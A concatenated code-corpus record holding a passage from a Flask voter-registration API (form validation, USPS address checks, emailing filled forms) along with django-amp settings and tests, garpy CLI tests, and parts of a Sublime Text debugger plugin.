if 'dob' not in requestData:
missingParams.append('dob')
else:
dob = requestData.get('dob').split('/')
if len(dob) != 3 or len(dob[0]) not in range(1, 3) or len(dob[1]) not in range(1, 3) or len(dob[2]) != 4:
otherErrors.append('dob must be in the form mm/dd/yyyy')
if 'zip' not in requestData:
missingParams.append('zip')
elif len(requestData.get('zip')) != 5:
otherErrors.append('zip must be 5 digits')
if missingParams:
error = 'Missing parameters: '
error += missingParams[0]
for i in range(1, len(missingParams)):
error = error + ', ' + missingParams[i]
resp = jsonify(error=error)
return make_response(resp, 400)
# check if address is valid
form = FormVR3(
addr = requestData.get('street'),
city = requestData.get('city'),
state = requestData.get('state'),
zip = requestData.get('zip'),
)
usps_api = USPS_API(form.data)
validated_addresses = usps_api.validate_addresses()
if not validated_addresses:
otherErrors.append('(street, city, state, zip) do not form a valid address')
if otherErrors:
error = otherErrors[0]
for i in range(1, len(otherErrors)):
error = error + ', ' + otherErrors[i]
resp = jsonify(error=error)
return make_response(resp, 400)
# check if the address is valid (via USPS address verification)
someJson = requestData
step = Step_0(someJson)
regFound = step.lookup_registration(
state=requestData.get('state'),
city=requestData.get('city'),
street=requestData.get('street'),
name_first=requestData.get('name_first'),
name_last=requestData.get('name_last'),
dob=requestData.get('dob'),
zipcode=requestData.get('zip')
)
#print(regFound)
if (regFound and 'status' not in regFound) or (regFound and 'status' in regFound and regFound['status'] == 'active'):
return jsonify({ 'registered': True })
elif regFound and 'status' in regFound:
return { 'registered': False, 'status': regFound['status'] }
else:
return { 'registered': False, 'status': 'not found' }
# backend api endpoint for filling out the Federal Form to register to vote
@main.route('/registertovote', strict_slashes=False, methods=['POST'])
@cross_origin(origin='*')
def reg():
# accept JSON data, default to Form data if no JSON in request
if request.json:
requestData = request.json
else:
requestData = request.form
# do error checking
missingParams = []
otherErrors = []
if 'name_first' not in requestData:
missingParams.append('name_first')
if 'name_last' not in requestData:
missingParams.append('name_last')
if 'state' not in requestData:
missingParams.append('state')
elif len(requestData.get('state')) != 2:
otherErrors.append('state must be 2 letter abbreviation')
if 'city' not in requestData:
missingParams.append('city')
if 'street' not in requestData:
missingParams.append('street')
if 'dob' not in requestData:
missingParams.append('dob')
else:
dobArr = requestData.get('dob').split('/')
if len(dobArr) != 3 or len(dobArr[0]) not in range(1, 3) or len(dobArr[1]) not in range(1, 3) or len(dobArr[2]) != 4:
otherErrors.append('dob must be in the form mm/dd/yyyy')
if 'zip' not in requestData:
missingParams.append('zip')
elif len(requestData.get('zip')) != 5:
otherErrors.append('zip must be 5 digits')
if 'email' not in requestData:
missingParams.append('email')
else:
emailArr = requestData.get('email').split('@')
if len(emailArr) != 2 or len(list(filter(None, emailArr[1].split('.')))) != 2:
otherErrors.append('invalid email')
if 'citizen' not in requestData:
missingParams.append('citizen')
elif requestData.get('citizen') != 'yes':
otherErrors.append('citizen parameter must be yes')
if 'eighteenPlus' not in requestData:
missingParams.append('eighteenPlus')
elif requestData.get('eighteenPlus') != 'yes':
otherErrors.append('eighteenPlus parameter must be yes')
if 'party' not in requestData:
missingParams.append('party')
if 'idNumber' not in requestData:
missingParams.append('idNumber')
elif not requestData.get('idNumber').isdigit():
otherErrors.append('invalid ID number')
if missingParams:
error = 'Missing parameters: '
error += missingParams[0]
for i in range(1, len(missingParams)):
error = error + ', ' + missingParams[i]
resp = jsonify(error=error)
return make_response(resp, 400)
# check if the address is valid (via USPS address verification)
# instead of an error, send a warning if address is invalid right after email is sent
form = FormVR3(
addr = requestData.get('street'),
city = requestData.get('city'),
state = requestData.get('state'),
zip = requestData.get('zip'),
)
usps_api = USPS_API(form.data)
validated_addresses = usps_api.validate_addresses()
if otherErrors:
error = otherErrors[0]
for i in range(1, len(otherErrors)):
error = error + ', ' + otherErrors[i]
resp = jsonify(error=error)
return make_response(resp, 400)
# get POST form body parameters
name_first = requestData.get('name_first')
name_last = requestData.get('name_last')
state = requestData.get('state')
city = requestData.get('city')
street = requestData.get('street')
dob = requestData.get('dob')
zip = requestData.get('zip')
email = requestData.get('email')
party = requestData.get('party')
idNumber = requestData.get('idNumber')
payload_file = 'app/services/tests/test-vr-en-payload.json'
with open(payload_file) as payload_f:
payload = json.load(payload_f)
payload['01_firstName'] = name_first
payload['01_lastName'] = name_last
payload['02_homeAddress'] = street
payload['02_aptLot'] = ""
payload['02_cityTown'] = city
payload['02_state'] = state
payload['02_zipCode'] = zip
payload['04_dob'] = dob
payload['07_party'] = party
payload['06_idNumber'] = idNumber
payload['00_citizen_yes'] = True
payload['00_eighteenPlus_yes'] = True
# fill out the voter registration form
ffs = FormFillerService(payload=payload, form_name='/vr/en')
img = ffs.as_image()
# use Gmail API to send email to the user with their voter reg form
emailServ = EmailService()
to = email
subject = 'Here’s your voter registration form'
messageWithAttachment = emailServ.create_message_with_attachment(to, subject, img)
emailServ.send_message(messageWithAttachment)
if not validated_addresses:
return { 'status': 'email sent', 'warning': '(street, city, state, zip) do not form a valid address' }
return { 'status': 'email sent' }
@main.route('/email', strict_slashes=False, methods=['POST'])
@cross_origin(origin='*')
def email():
# accept JSON data, default to Form data if no JSON in request
if request.json:
requestData = request.json
else:
requestData = request.form
# do error checking
missingParams = []
if 'email' not in requestData:
missingParams.append('email')
else:
emailArr = requestData.get('email').split('@')
if len(emailArr) != 2 or len(list(filter(None, emailArr[1].split('.')))) != 2:
resp = jsonify(error='invalid email: ' + requestData.get('email'))
return make_response(resp, 400)
if 'type' not in requestData:
missingParams.append('type')
elif requestData.get('type') == 'badgeEarned':
if 'avatar' not in requestData or 'daysLeft' not in requestData or 'badgesLeft' not in requestData:
resp = jsonify(error='for badgeEarned emails, parameters avatar, daysLeft, and badgesLeft are required')
return make_response(resp, 400)
elif (requestData.get('type') == 'registered' or requestData.get('type') == 'electionReminder') and ('avatar' not in requestData or 'firstName' not in requestData):
resp = jsonify(error='for ' + requestData.get('type') + ' emails, parameters avatar and firstName are required')
return make_response(resp, 400)
elif requestData.get('type') == 'challengeWon' and 'avatar' not in requestData:
resp = jsonify(error='for ' + requestData.get('type') + ' emails, parameter avatar is required')
return make_response(resp, 400)
if missingParams:
error = 'Missing parameters: '
error += missingParams[0]
for i in range(1, len(missingParams)):
error = error + ', ' + missingParams[i]
resp = jsonify(error=error)
return make_response(resp, 400)
# Initialize email service that uses Gmail API
emailServ = EmailService()
emailTo = requestData.get('email')
type = requestData.get('type')
daysLeft = requestData.get('daysLeft')
badgesLeft = requestData.get('badgesLeft')
firstName = requestData.get('firstName')
avatar = requestData.get('avatar')
isChallenger = requestData.get('isChallenger')
# Attempt to create the email template that was asked for
try:
message = emailServ.create_template_message(emailTo, type, daysLeft, badgesLeft, firstName, avatar, isChallenger)
emailServ.send_message(message)
if type == 'challengerWelcome':
# Start the scheduler
#sched = BackgroundScheduler()
#sched.start()
currDay = datetime.today()
#challengeEnd = currDay + timedelta(days=8)
# Store the job in a variable in case we want to cancel it.
# The job will be executed on the day the challenge ends
#job = sched.add_job(delay_send, 'date', run_date=challengeEnd, args=[emailTo])
return { 'status': 'email sent' }
except ValueError: # value error if email type provided by user is not valid
resp = jsonify(error='invalid template type, valid types include: challengerWelcome, badgeEarned, challengeWon, challengeIncomplete, playerWelcome, registered, electionReminder')
return make_response(resp, 400)
except Exception as e:
resp = jsonify(error='invalid email: ' + emailTo)
return make_response(resp, 400)
def delay_send(emailTo):
# Initialize email service that uses Gmail API
emailServ = EmailService()
message = emailServ.create_template_message(emailTo, 'challengeIncomplete')
emailServ.send_message(message)
return 'delayed email sent'
'''
def create_scheduled_job():
client = scheduler_v1.CloudSchedulerClient.from_service_account_info({
"type": "service_account",
"project_id": os.getenv('PROJECT_ID'),
"private_key_id": os.getenv('PRIVATE_KEY_ID'),
"private_key": os.getenv('PRIVATE_KEY'),
"client_email": os.getenv('CLIENT_EMAIL'),
"client_id": os.getenv('CLIENT_ID_GCS'),
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://oauth2.googleapis.com/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/emailscheduler%40by8-318322.iam.gserviceaccount.com"
}
)
parent= client.location_path(os.getenv('PROJECT_ID'),'us-west1')
job={"name":"projects/your-project/locations/app-engine-location/jobs/traing_for_model",
"description":"this is for testing training model",
"http_target": {"uri":"https://us-central1-gerald-automl-test.cloudfunctions.net/automl-trainmodel-1-test-for-cron-job"},
"schedule":"0 10 * * *",
"time_zone":"America/Los_Angeles",
}
job = {
"name": "",
"http_target": {
"http_method": "POST",
"uri": uri,
"headers": {"Content-Type": "application/json"},
"body": {'email': '<EMAIL>',
'type': 'challengeIncomplete',
'avatar': '2',
'daysLeft': '3',
'badgesLeft': '4',
'firstName': 'Wesley'},
},
"schedule": "* * * * *",
"time_zone":"America/Los_Angeles",
}
# https://googleapis.dev/python/cloudscheduler/latest/scheduler_v1/cloud_scheduler.html
# use update_job to update the schedule of the job to sent emails
response = client.create_job(parent, job)
training_job= client.create_job(parent,job)
'''
''' Old endpoints from KSVotes '''
# default route
@main.route('/', methods=["GET"])
def index():
g.locale = guess_locale()
return render_template('about.html')
@main.route('/privacy-policy', methods=['GET'])
def privacy():
g.locale = guess_locale()
return render_template('privacy-policy.html')
@main.route('/about', methods=['GET'])
def about_us():
g.locale = guess_locale()
return render_template('about.html')
# endpoint to check in on the status of the application
@main.route('/memory/', methods=['GET'])
def memory():
import tracemalloc
import linecache
import os
key_type = 'lineno'
limit = 20
snapshot = tracemalloc.take_snapshot()
snapshot = snapshot.filter_traces((
tracemalloc.Filter(False, "<frozen importlib._bootstrap>"),
tracemalloc.Filter(False, "<frozen importlib._bootstrap_external>"),
tracemalloc.Filter(False, "<unknown>"),
))
top_stats = snapshot.statistics(key_type)
buff = []
buff.append("Top %s lines" % limit)
for index, stat in enumerate(top_stats[:limit], 1):
frame = stat.traceback[0]
buff.append("#%s: %s:%s: %.1f KiB"
% (index, frame.filename, frame.lineno, stat.size / 1024))
line = linecache.getline(frame.filename, frame.lineno).strip()
if line:
buff.append(' %s' % line)
other = top_stats[limit:]
if other:
size = sum(stat.size for stat in other)
buff.append("%s other: %.1f KiB" % (len(other), size / 1024))
total = sum(stat.size for stat in top_stats)
buff.append("Total allocated size: %.1f KiB" % (total / 1024))
return jsonify(status='ok', total=total, report=buff, pid=os.getpid())
```
#### File: app/services/ses_mailer.py
```python
import boto3
import botocore
import newrelic.agent
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from flask import current_app
import os
# used for emailing to states
class SESMailer():
def to_html(self, txt):
html = '<html><body><p>' + txt.replace("\n", '</p><p>') + '</p></body></html>'
return html
def build_msg(self, **kwargs):
recip_to = kwargs['to'] if 'to' in kwargs else None
if not recip_to:
raise('to required')
recip_cc = kwargs['cc'] if 'cc' in kwargs else []
recip_bcc = kwargs['bcc'] if 'bcc' in kwargs else []
subject = kwargs['subject'] if 'subject' in kwargs else 'no subject'
body = kwargs['body'] if 'body' in kwargs else 'this space left blank'
attachments = kwargs['attach'] if 'attach' in kwargs else []
msg = MIMEMultipart()
msg['Subject'] = str(subject)
msg['To'] = ', '.join(recip_to)
msg['Cc'] = ', '.join(recip_cc)
msg['Bcc'] = ', '.join(recip_bcc)
msg['X-KSV-Sent-From'] = os.getenv('NEW_RELIC_APP_NAME', default='ksvotes-dev')
# order of mime parts is important, as last is preferred in client view.
readable_msg = MIMEMultipart('alternative')
readable_msg.attach(MIMEText(body, 'plain' , 'utf-8'))
readable_msg.attach(MIMEText(self.to_html(body), 'html', 'utf-8'))
msg.attach(readable_msg)
for attachment in attachments:
file_name = attachment['name']
mime_part = MIMEApplication(attachment['img'])
mime_part.add_header('Content-Disposition', 'attachment', filename=file_name)
mime_part.add_header('Content-Type', 'image/png; name="{}"'.format(file_name))
msg.attach(mime_part)
return msg
def send_msg(self, msg, sender):
msg['From'] = sender
# no email sent unless explicitly configured.
if not current_app.config['SEND_EMAIL']:
return {'msg': msg, 'MessageId': 'set SEND_EMAIL env var to enable email'}
try:
if 'To' not in msg or not msg['To']:
raise RuntimeError("Missing To in %s" %(msg.as_string()))
# test our error handling
if msg['To'] == current_app.config['FAIL_EMAIL']:
raise RuntimeError('Failure testing works')
ses = boto3.client('ses',
region_name=current_app.config['AWS_DEFAULT_REGION'],
aws_access_key_id=current_app.config['SES_ACCESS_KEY_ID'],
aws_secret_access_key=current_app.config['SES_SECRET_ACCESS_KEY']
)
resp = ses.send_raw_email(
RawMessage={'Data': msg.as_string()},
Source=sender,
)
return resp
except botocore.exceptions.ClientError as err:
current_app.logger.error(str(err))
newrelic.agent.record_exception()
return {'msg': msg, 'MessageId': False, 'error': err}
except (RuntimeError, TypeError, NameError) as err:
current_app.logger.error(str(err))
newrelic.agent.record_exception()
return {'msg': msg, 'MessageId': False, 'error': err}
```
#### File: app/services/session_manager.py
```python
from app.services.steps import *
from flask import g, current_app
class SessionManager():
"""
Session manager is responsible for taking in a registrant and current step and then determining which step needs to be performed next.
"""
# initialize these as None, override them with init method if valid.
next_step = None
prev_step = None
def __init__(self, registrant, current_step):
self.registrant = registrant
self.current_step = current_step
self._init_next_step()
self._init_prev_step()
def _init_next_step(self):
"""
If the current step has a next step set, initialize the next step class and save it to self.
"""
if self.current_step.next_step:
next_step = globals()[self.current_step.next_step]
self.next_step = next_step()
def _init_prev_step(self):
"""
If the current step has a previous step set, initialize the previous step class and save it to self.
"""
if self.current_step.prev_step:
prev_step = globals()[self.current_step.prev_step]
self.prev_step = prev_step()
def vr_completed(self):
if self.registrant.vr_completed_at and self.registrant.try_value('vr_form', False):
return True
return False
def ab_completed(self):
if self.registrant.ab_completed_at and self.registrant.try_value('ab_forms', False):
return True
return False
def get_locale_url(self, endpoint):
lang_code = g.get('lang_code', None)
if lang_code:
return '/' + lang_code + endpoint
else:
return endpoint
def get_redirect_url(self):
"""
Should always return a url path. Look at the current step and determine if the user needs to:
A: Move on to next step.
B: Move back to previous step.
C: Stay at current step.
"""
# For Step 0 when no previous step exists
if not self.prev_step:
if self.current_step.is_complete:
return self.get_locale_url(self.next_step.endpoint)
else:
return self.get_locale_url(self.current_step.endpoint)
# For the previous step iterate all of the requirements.
# If the requirement is not fulfilled return the previous step url
for req in self.prev_step.all_requirements():
# if a requirement is missing return the endpoint for the previous step
if not self.registrant.has_value_for_req(req):
return self.get_locale_url(self.prev_step.endpoint)
# if the step has been completed move on
if self.current_step.is_complete:
return self.get_locale_url(self.next_step.endpoint)
#default to returning current step
return self.get_locale_url(self.current_step.endpoint)
```
#### File: services/steps/step_1.py
```python
from app.services.steps import Step
from flask import g
# this is a placeholder. No action required, just routing to change-or-apply
class Step_1(Step):
form_requirements = []
step_requirements = []
endpoint = '/change-or-apply'
prev_step = 'Step_0'
next_step = None
is_complete = False
def run(self):
return True
```
#### File: services/steps/step_ab_3.py
```python
from app.services.steps import Step
from flask import g
from app.services.usps_api import USPS_API
class Step_AB_3(Step):
form_requirements = ['addr', 'city', 'state', 'zip']
step_requirements = ['addr_lookup_complete']
address_order = ['current_address']
endpoint = '/ab/address'
addr_lookup_complete = False
prev_step = 'Step_AB_1'
next_step = None
def run(self):
if self.is_complete:
return True
if self.form_payload.get('has_mail_addr'):
self.form_requirements = self.form_requirements + ['mail_addr', 'mail_city', 'mail_state', 'mail_zip']
if not self.verify_form_requirements():
return False
usps_api = USPS_API(self.form_payload)
self.validated_addresses = usps_api.validate_addresses()
self.addr_lookup_complete = True
self.is_complete = True
self.next_step = 'Step_AB_5'
return True
``` |
{
"source": "8ByteCore8/django-amp",
"score": 2
} |
#### File: django-amp/amp/settings.py
```python
from django.conf import settings as django_settings
import django
class SettingsProxy(object):
def __init__(self, settings, defaults):
self.settings = settings
self.defaults = defaults
def __getattr__(self, attr):
try:
return getattr(self.settings, attr)
except AttributeError:
try:
return getattr(self.defaults, attr)
except AttributeError:
raise AttributeError(
u'settings object has no attribute "%s"' % attr)
class defaults(object):
USE_AMP = False
AMP_GET_PARAMETER = u'amp'
AMP_GET_VALUE = u'1'
AMP_TEMPLATE_PREFIX = u"amp/"
AMP_GEN_PATH = True
AMP_DEFAULT_WIDTH = 1.5
AMP_DEFAULT_HEIGHT = 1
AMP_IMG_TEMPLATE = u'<amp-img src="$src" width="$width" height="$height" layout="responsive" alt="$alt"></amp-img>'
AMP_IFRAME_TEMPLATE = u'<amp-iframe width="$width" height="$height" sandbox="allow-scripts allow-same-origin" layout="responsive" frameborder="0" src="$src"></amp-iframe>'
settings = SettingsProxy(django_settings, defaults)
```
#### File: django-amp/amp/tests.py
```python
from django.test import TestCase
from . import get_template_name, set_amp_detect, get_amp_detect
from .settings import settings
# Create your tests here.
class AMPTestCase(TestCase):
def setUp(self):
pass
def test_get_template_name(self):
template_name = 'test/index.html'
settings.USE_AMP = True
set_amp_detect(False)
self.assertEqual(get_template_name(template_name), 'test/index.html')
set_amp_detect(True)
settings.AMP_USE_TEMPLATE_POSTFIX = False
self.assertEqual(get_template_name(
template_name), 'amp/test/index.html')
settings.AMP_USE_TEMPLATE_POSTFIX = True
self.assertEqual(get_template_name(
template_name), 'test/amp/index.html')
def test_amp_detect(self):
settings.USE_AMP = False
set_amp_detect(True)
self.assertEqual(get_amp_detect(), False)
set_amp_detect(False)
self.assertEqual(get_amp_detect(), False)
settings.USE_AMP = True
set_amp_detect(True)
self.assertEqual(get_amp_detect(), True)
set_amp_detect(False)
self.assertEqual(get_amp_detect(), False)
``` |
{
"source": "8cH9azbsFifZ/garpy",
"score": 2
} |
#### File: garpy/tests/test_cli.py
```python
from pathlib import Path
from unittest.mock import patch
from click.testing import CliRunner
from garpy import cli
class TestCLI:
"""cli.main"""
def test_download_username_password_only(self):
with patch.object(cli.GarminClient, "_authenticate", return_value=None):
with patch.object(cli.ActivitiesDownloader, "__call__", return_value=None):
runner = CliRunner()
with runner.isolated_filesystem():
result = runner.invoke(
cli.main, ["download", "-u", "dummy", "-p", "password"]
)
assert result.exit_code == 0
def test_download_several_formats(self):
with patch.object(cli.GarminClient, "_authenticate", return_value=None):
with patch.object(cli.ActivitiesDownloader, "__call__", return_value=None):
runner = CliRunner()
with runner.isolated_filesystem():
result = runner.invoke(cli.main, ["download", "-u", "dummy", "-p", "password", "-f", "gpx", "-f", "fit"])
assert result.exit_code == 0
def test_download_fails_with_existing_file_as_bakcup_dir(self, tmp_path):
with patch.object(cli.GarminClient, "_authenticate", return_value=None):
with patch.object(cli.ActivitiesDownloader, "__call__", return_value=None):
runner = CliRunner()
with runner.isolated_filesystem():
backup_dir = Path(tmp_path) / "text_file"
backup_dir.touch()
result = runner.invoke(cli.main, ["download", "-u", "dummy", "-p", "password", str(backup_dir)])
assert result.exit_code == 1
assert (
str(result.exception)
== "The provided backup directory exists and is a file"
)
``` |
{
"source": "8cloud8/terraform-modules",
"score": 2
} |
#### File: lambda-function/test/test_lambda.py
```python
import boto3
client = boto3.client('sts')
print("loading function")
def whoami_handler(event, context):
print ('Hello from aws identity:' + client.get_caller_identity()['Arn'])
``` |
{
"source": "8ctopus/sublime_debugger",
"score": 3
} |
#### File: modules/core/log.py
```python
from ..typecheck import *
_should_log_exceptions = True
_should_log_error = True
_should_log_info = True
def log_configure(log_info: bool, log_errors: bool, log_exceptions: bool):
global _should_log_exceptions
global _should_log_error
global _should_log_info
_should_log_exceptions = log_exceptions
_should_log_error = log_errors
_should_log_info = log_info
def log_error(*args) -> None:
if not _should_log_error:
return
print(*args)
def log_exception(*args) -> None:
import traceback
if not _should_log_exceptions:
return
print(*args, end='')
print(traceback.format_exc())
def log_info(*args) -> None:
if not _should_log_info:
return
print(*args)
class Logger(Protocol):
def error(self, value: str):
...
def info(self, value: str):
...
```
#### File: debugger/adapter/install.py
```python
from ...typecheck import *
from ...import core
from ...libs import certifi
import os
import shutil
import zipfile
import gzip
import urllib.request
import json
import sublime
def _adapters_path() -> str:
return os.path.join(core.current_package(), 'data', 'debug_adapters')
class AdapterInstall:
@core.coroutine
def install(self, log: core.Logger) -> core.awaitable[None]: ...
@property
def installed(self) -> bool: ...
def installed_info(self) -> 'AdapterInstalledInformation': ...
class AdapterInstalledInformation:
def __init__(self, version: int, snippets: list):
self.version = version
self.snippets = snippets
class VSCodeAdapterInstall:
def __init__(self, name: str, url: str) -> None:
self.name = name
self.url = url
self.path = os.path.join(_adapters_path(), self.name)
@staticmethod
def from_json(json: dict) -> 'VSCodeAdapterInstall':
return VSCodeAdapterInstall(json['name'], json['url'])
@property
def installed(self) -> bool:
return os.path.isfile(os.path.join(self.path, 'sublime_debugger.json'))
def installed_info(self) -> AdapterInstalledInformation:
snippets_output_file = os.path.join(self.path, 'sublime_debugger.json')
snippets_file_exists = os.path.isfile(snippets_output_file)
if snippets_file_exists:
with open(snippets_output_file) as file:
j = json.load(file)
return AdapterInstalledInformation(j.get('version', 0), j['configurationSnippets'])
return AdapterInstalledInformation(0, [])
@core.coroutine
def install(self, log: core.Logger) -> core.awaitable[None]:
try:
log.info('Installing adapter: {}'.format(self.name))
yield from core.run_in_executor(self.downalod_and_extract_blocking, log)
vscode_package_file = os.path.join(self.path, 'extension', 'package.json')
snippets_output_file = os.path.join(self.path, 'sublime_debugger.json')
snippets = [] #type: List[dict]
with open(vscode_package_file, "rb") as file:
j = sublime.decode_value(file.read().decode('utf-8'))
version = j.get('version')
for debugger in j.get('contributes', {}).get('debuggers', []):
snippets.extend(debugger.get('configurationSnippets', []))
with open(snippets_output_file, 'w') as snippets_file:
sublime_adapter_info = {
'configurationSnippets': snippets,
'version': version
}
content = json.dumps(sublime_adapter_info)
# strip out unescaped stuff
# FIXME this isn't correct... but good enough for now...
content = content.replace('^\\\"', '')
content = content.replace('\\\"', '')
snippets_file.write(content)
log.info('Finished Installing adapter: {}'.format(self.name))
except Exception as e:
log.info('Failled Finished Installing adapter: {}'.format(e))
def downalod_and_extract_blocking(self, log: core.Logger):
def log_info(value: str):
core.call_soon_threadsafe(log.info, value)
# ensure adapters folder exists
adapters_path = _adapters_path()
if not os.path.isdir(adapters_path):
os.mkdir(adapters_path)
if os.path.isdir(self.path):
log_info('Removing existing adapter...')
shutil.rmtree(_abspath_fix(self.path))
log_info('done')
log_info('downloading: {}'.format(self.url))
request = urllib.request.Request(self.url, headers={
'Accept-Encoding': 'gzip'
})
response = urllib.request.urlopen(request, cafile=certifi.where())
if response.getcode() != 200:
raise core.Error('Bad response from server, got code {}'.format(response.getcode()))
os.mkdir(self.path)
content_encoding = response.headers.get('Content-Encoding')
if content_encoding == 'gzip':
data_file = gzip.GzipFile(fileobj=response) #type: ignore
else:
data_file = response
archive_name = '{}.zip'.format(self.path)
with open(archive_name, 'wb') as out_file:
copyfileobj(data_file, out_file, log_info, int(response.headers.get('Content-Length', '0')))
log_info('extracting zip... ')
with ZipfileLongPaths(archive_name) as zf:
zf.extractall(self.path)
log_info('done')
os.remove(archive_name)
# https://stackoverflow.com/questions/29967487/get-progress-back-from-shutil-file-copy-thread
def copyfileobj(fsrc, fdst, log_info, total, length=128*1024):
copied = 0
while True:
buf = fsrc.read(length)
if not buf:
break
fdst.write(buf)
copied += len(buf)
log_info("{:.2f} mb {}%".format(copied/1024/1024, int(copied/total*100)))
# Fix for long file paths on windows not being able to be extracted from a zip file
# Fix for extracted files losing their permission flags
# https://stackoverflow.com/questions/40419395/python-zipfile-extractall-ioerror-on-windows-when-extracting-files-from-long-pat
# https://stackoverflow.com/questions/39296101/python-zipfile-removes-execute-permissions-from-binaries
class ZipfileLongPaths(zipfile.ZipFile):
def _path(self, path, encoding=None):
return _abspath_fix(path)
def extract(self, member, path=None, pwd=None):
if not isinstance(member, zipfile.ZipInfo):
member = self.getinfo(member)
if path is None:
path = os.getcwd()
ret_val = self._extract_member(member, path, pwd)
attr = member.external_attr >> 16
os.chmod(ret_val, attr)
return ret_val
def _extract_member(self, member, targetpath, pwd):
targetpath = self._path(targetpath)
return zipfile.ZipFile._extract_member(self, member, targetpath, pwd) #type: ignore
def _abspath_fix(path):
if core.platform.windows:
path = os.path.abspath(path)
if path.startswith("\\\\"):
path = "\\\\?\\UNC\\" + path[2:]
else:
path = "\\\\?\\" + path
return path
```
#### File: modules/debugger/config.py
```python
from .. typecheck import *
from .. import core
from .adapter import Configuration
from .breakpoints import Breakpoints
import sublime
import os
import json
def _project_data_file(project_path: str) -> str:
import hashlib
hash = hashlib.sha224(project_path.encode('utf-8')).hexdigest()
return os.path.join(core.current_package(), "data/{}.json".format(hash))
class PersistedData:
def __init__(self, project_name: str) -> None:
self.project_name = project_name
self.json = {} #type: dict
VERSION_NUMBER = 0
self.json["version"] = VERSION_NUMBER
try:
file_name = _project_data_file(project_name)
file = open(file_name, 'r+')
contents = file.read()
file.close()
j = json.loads(contents)
if j["version"] == VERSION_NUMBER:
self.json = j
except FileNotFoundError:
pass
def save_breakpoints(self, breakpoints: Breakpoints) -> None:
self.json['breakpoints'] = breakpoints.into_json()
def load_breakpoints(self, breakpoints: Breakpoints):
breakpoints.load_from_json(self.json.get('breakpoints', {}))
def save_configuration_option(self, configuration: Configuration) -> None:
self.json['config_name'] = configuration.name
self.json['config_maybe_at_index'] = configuration.index
def load_configuration_option(self, configurations: List[Configuration]) -> Optional[Configuration]:
config_name = self.json.get('config_name')
config_maybe_at_index = self.json.get('config_maybe_at_index')
if config_name is None or config_maybe_at_index is None:
return None
try:
configuration = configurations[config_maybe_at_index]
if configuration.name == config_name:
return configuration
except IndexError:
pass
for configuration in configurations:
if configuration.name == config_name:
return configuration
return None
def save_to_file(self) -> None:
file_name = _project_data_file(self.project_name)
data = json.dumps(self.json, indent='\t', sort_keys=True)
file = open(file_name, 'w+')
contents = file.write(data)
file.close()
```
#### File: modules/debugger/util.py
```python
from ..typecheck import *
from ..import core
from ..import ui
import sublime
import re
class SettingsChangedCallbabck:
id = 0
def __init__(self, settings: List[sublime.Settings], on_changed: Callable[[], None]) -> None:
SettingsChangedCallbabck.id += 1
self.settings = settings
self.key = 'SettingsChangedCallbabck{}'.format(SettingsChangedCallbabck.id)
for setting in settings:
setting.add_on_change(self.key, on_changed)
def dispose(self) -> None:
for setting in self.settings:
setting.clear_on_change(self.key)
class WindowSettingsCallback:
def __init__(self, window: sublime.Window, on_changed: Callable[[], None]):
self.window = window
self.settings_changed_callback = None #type: Optional[SettingsChangedCallbabck]
self.on_changed = on_changed
self.on_view_updated = ui.view_activated.add(self.on_update_settings_view)
view = window.active_view()
if view:
self.update(view)
def on_update_settings_view(self, view: sublime.View):
if view.window() == self.window:
self.update(view)
def update(self, view: sublime.View):
core.log_info("updating settings callback view")
if self.settings_changed_callback:
self.settings_changed_callback.dispose()
self.settings_changed_callback = None
plugin_settings = sublime.load_settings('debugger.sublime-settings')
view_settings = view.settings()
self.settings_changed_callback = SettingsChangedCallbabck([plugin_settings, view_settings], self.on_changed)
def dispose(self):
self.on_view_updated.dispose()
if self.settings_changed_callback:
self.settings_changed_callback.dispose()
self.settings_changed_callback = None
def get_setting(view: Optional[sublime.View], setting: str, default: Any = None) -> Any:
plugin_settings = sublime.load_settings('debugger.sublime-settings')
plugin_setting = plugin_settings.get(setting, default)
if not view:
return plugin_setting
project_setting = view.settings().get("debug." + setting, plugin_setting)
return project_setting
```
#### File: debugger/views/breakpoints_panel.py
```python
from ...typecheck import *
from ...import ui
from ...import core
from ..breakpoints import (
Breakpoints,
IBreakpoint,
SourceBreakpoint,
DataBreakpoint,
FunctionBreakpoint,
ExceptionBreakpointsFilter,
)
from .layout import breakpoints_panel_width
from .import css
import os
import sublime
class BreakpointsPanel(ui.div):
def __init__(self, breakpoints: Breakpoints) -> None:
super().__init__()
self.breakpoints = breakpoints
self.selected = None
# FIXME put in on activate/deactivate
breakpoints.source.on_updated.add(self._updated)
breakpoints.filters.on_updated.add(self._updated)
breakpoints.data.on_updated.add(self._updated)
breakpoints.function.on_updated.add(self._updated)
def _updated(self, data: Any) -> None:
self.dirty()
def on_select(self, breakpoint: IBreakpoint) -> None:
if isinstance(breakpoint, DataBreakpoint):
self.breakpoints.data.edit(breakpoint).run()
return
if isinstance(breakpoint, FunctionBreakpoint):
self.breakpoints.function.edit(breakpoint).run()
return
if isinstance(breakpoint, ExceptionBreakpointsFilter):
self.breakpoints.filters.edit(breakpoint).run()
return
if isinstance(breakpoint, SourceBreakpoint):
self.breakpoints.source.edit(breakpoint).run()
return
assert False, "unreachable"
def on_toggle(self, breakpoint: IBreakpoint) -> None:
if isinstance(breakpoint, DataBreakpoint):
self.breakpoints.data.toggle(breakpoint)
return
if isinstance(breakpoint, FunctionBreakpoint):
self.breakpoints.function.toggle(breakpoint)
return
if isinstance(breakpoint, ExceptionBreakpointsFilter):
self.breakpoints.filters.toggle(breakpoint)
return
if isinstance(breakpoint, SourceBreakpoint):
self.breakpoints.source.toggle(breakpoint)
return
assert False, "unreachable"
def render(self) -> ui.div.Children:
items = [] #type: List[ui.div]
for breakpoints in (self.breakpoints.filters, self.breakpoints.function, self.breakpoints.data, self.breakpoints.source):
for breakpoint in breakpoints: #type: ignore
if breakpoint.tag:
tag_and_name = [
ui.span(css=css.button)[
ui.text(breakpoint.tag, css=css.label),
],
ui.text(breakpoint.name, css=css.label_secondary_padding),
]
else:
tag_and_name = [
ui.text(breakpoint.name, css=css.label_secondary),
]
items.append(ui.div(height=3)[
ui.click(lambda breakpoint=breakpoint: self.on_toggle(breakpoint))[ #type: ignore
ui.icon(breakpoint.image),
],
ui.click(lambda breakpoint=breakpoint: self.on_select(breakpoint))[ #type: ignore
tag_and_name
]
])
return items
```
#### File: debugger/views/selected_line.py
```python
from ... typecheck import *
from ... import ui
from . import css
import sublime
class UnderlineComponent(ui.div):
def __init__(self) -> None:
super().__init__()
